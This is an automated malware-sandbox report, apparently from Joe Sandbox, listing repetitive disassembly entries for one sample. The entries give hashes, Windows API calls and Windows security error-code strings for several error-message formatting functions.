API String ID: 1435330505-2000925551
Opcode ID: e056cf3e6dc9e0495b083fa39f9abda904dc560eeaad2d8842722b571ae5303d
Instruction ID: 731ef06be373b900265c9e9375d5da32816380e6363929fb4e2f2d049a289fb9
Opcode Fuzzy Hash: e056cf3e6dc9e0495b083fa39f9abda904dc560eeaad2d8842722b571ae5303d
Instruction Fuzzy Hash: BD118222618A4285E768FF10A0402FDA375FF88741FC14036D99E027D6DFBCD445C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEE25 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_PKINIT_CLIENT_FAILURE, xrefs: 00007FF7F1DAEE25
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_PKINIT_CLIENT_FAILURE
API String ID: 1435330505-751537933
Opcode ID: 1627c26d4eb300424a7047a3f50406876f7c33a145d383bd92fc89cb502bb4a8
Instruction ID: b4f2e0daee53d42b7926f4d35c95b80ddd900e3f94c1de2ba2e74dc455326a6c
Opcode Fuzzy Hash: 1627c26d4eb300424a7047a3f50406876f7c33a145d383bd92fc89cb502bb4a8
Instruction Fuzzy Hash: E0118222618A4285E768FF10A0402FDA375FF88741FC14036D99E027D6DFBCE445C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEE19 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C
SEC_E_OUT_OF_SEQUENCE, xrefs: 00007FF7F1DAEE19

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_OUT_OF_SEQUENCE
API String ID: 1435330505-3748170351
Opcode ID: 97b03c64a3621921bd8a0e35a025e05ffb63e5522aa64c2c152ae1966e264eb6
Instruction ID: b701ffad2fdcaab946ec5774937325061c4e99210c831194c98141bc27680722
Opcode Fuzzy Hash: 97b03c64a3621921bd8a0e35a025e05ffb63e5522aa64c2c152ae1966e264eb6
Instruction Fuzzy Hash: 0E116D22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEE31 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C
SEC_E_PKINIT_NAME_MISMATCH, xrefs: 00007FF7F1DAEE31

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_PKINIT_NAME_MISMATCH
API String ID: 1435330505-150002090
Opcode ID: f38405e0da77630303fafb2dff8b3ccb76a48b2bc13f3757ad187b8bdde8741f
Instruction ID: 6c8b046b6fd84802af18bb18c6b15cf97c3ac016301b093c110797952f043109
Opcode Fuzzy Hash: f38405e0da77630303fafb2dff8b3ccb76a48b2bc13f3757ad187b8bdde8741f
Instruction Fuzzy Hash: D1118222618A4285E768FF10A0402FDA375FF88741FC14036D99E027D6DFBCD445C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEE01 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_NO_S4U_PROT_SUPPORT, xrefs: 00007FF7F1DAEE01
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_NO_S4U_PROT_SUPPORT
API String ID: 1435330505-839832400
Opcode ID: 1a61c974587919529a56b9ba9e972241c3deb2df1046477ba5706b0306396755
Instruction ID: 2e35567f77961f51cfca772aa43ead4000879fedc793481823fd42156ddca760
Opcode Fuzzy Hash: 1a61c974587919529a56b9ba9e972241c3deb2df1046477ba5706b0306396755
Instruction Fuzzy Hash: B3116D22618B4285E7A8FF10A0402EDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEE0D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_NO_TGT_REPLY, xrefs: 00007FF7F1DAEE0D
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_NO_TGT_REPLY
API String ID: 1435330505-2640736245
Opcode ID: 5cce48d33509d81210e853d872af67352e315a3b75540eba7f338ed2bef99aeb
Instruction ID: e7f25da1315363e68db119423f40b2659908fd0e6549f4f2b2f37009c41ac775
Opcode Fuzzy Hash: 5cce48d33509d81210e853d872af67352e315a3b75540eba7f338ed2bef99aeb
Instruction Fuzzy Hash: 02116D26618A4285E7A8FF10A0402EDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEDDD Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_NO_IP_ADDRESSES, xrefs: 00007FF7F1DAEDDD
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_NO_IP_ADDRESSES
API String ID: 1435330505-2704457502
Opcode ID: e235f45c3e229ece7590dd75cafce70d832f86bc2ff7804f97a7be30f0d2bc89
Instruction ID: abf7247bef9bc0ca04e80142e54c739f58895aededdcf87667c66399efa5f9dc
Opcode Fuzzy Hash: e235f45c3e229ece7590dd75cafce70d832f86bc2ff7804f97a7be30f0d2bc89
Instruction Fuzzy Hash: 11116D22618A4285E7A9FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEDF5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
SEC_E_NO_PA_DATA, xrefs: 00007FF7F1DAEDF5
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_NO_PA_DATA
API String ID: 1435330505-2211492245
Opcode ID: 353f13fe14f87235a997bad30c687cde4c67812a9ff5a832dee23c336d2a1b18
Instruction ID: 67d7a6a2824a4b4529c94db4da185fd26606b294310fe735816521a27b7816dc
Opcode Fuzzy Hash: 353f13fe14f87235a997bad30c687cde4c67812a9ff5a832dee23c336d2a1b18
Instruction Fuzzy Hash: 2A116D22618A4285E7A8FF10A0402EDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEDE9 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_NO_KERB_KEY, xrefs: 00007FF7F1DAEDE9
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_NO_KERB_KEY
API String ID: 1435330505-1707302738
Opcode ID: 63f6afb085b1445b8bd16bc8abab2ff036b0227d7b105ce9a078973c1f8a3f0c
Instruction ID: 56acae1897592d54884442b758e5a70c8d82fc4d57ba6cd3d5a6c40ad6b3a637
Opcode Fuzzy Hash: 63f6afb085b1445b8bd16bc8abab2ff036b0227d7b105ce9a078973c1f8a3f0c
Instruction Fuzzy Hash: 8E116D22618A4285E7A8FF10A0402EDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEDC5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_NO_CREDENTIALS, xrefs: 00007FF7F1DAEDC5
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_NO_CREDENTIALS
API String ID: 1435330505-2672095485
Opcode ID: bdc16241a4db5473303296a4d2af5f3dfd6d169c0f16b074dbce383baa27d7c0
Instruction ID: d1a3efa43fe5dccaa4927f202fefae073089eba7aa7dad516ae0c5df2b297578
Opcode Fuzzy Hash: bdc16241a4db5473303296a4d2af5f3dfd6d169c0f16b074dbce383baa27d7c0
Instruction Fuzzy Hash: 2C116D22618A4285E7A8FF10A0402EDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEDB9 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
SEC_E_NO_AUTHENTICATING_AUTHORITY, xrefs: 00007FF7F1DAEDB9
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_NO_AUTHENTICATING_AUTHORITY
API String ID: 1435330505-3294358665
Opcode ID: 29aaa159e840c9834c68c2cfa6ff841cbdd10aca7092468762173caa3d137782
Instruction ID: d89787e89a47315f25042d2ac93d66c43b1b77e9105ffd8f0cc78ec9e5eac1ea
Opcode Fuzzy Hash: 29aaa159e840c9834c68c2cfa6ff841cbdd10aca7092468762173caa3d137782
Instruction Fuzzy Hash: 07116D22618A4285E7A8FF10A0402EDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEDD1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C
SEC_E_NO_IMPERSONATION, xrefs: 00007FF7F1DAEDD1

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_NO_IMPERSONATION
API String ID: 1435330505-480010766
Opcode ID: 2e46b5d00165c9c9defe6e3bde39fddb1a5eac614a589c9d357c6a2cc8d9bd36
Instruction ID: ba1fea7a9bfcf056c4445c554b8106e98851d5d887008616601c12bd3a06e1e6
Opcode Fuzzy Hash: 2e46b5d00165c9c9defe6e3bde39fddb1a5eac614a589c9d357c6a2cc8d9bd36
Instruction Fuzzy Hash: 91116D26618A4285E7A9FF10A0442EDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEDA1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
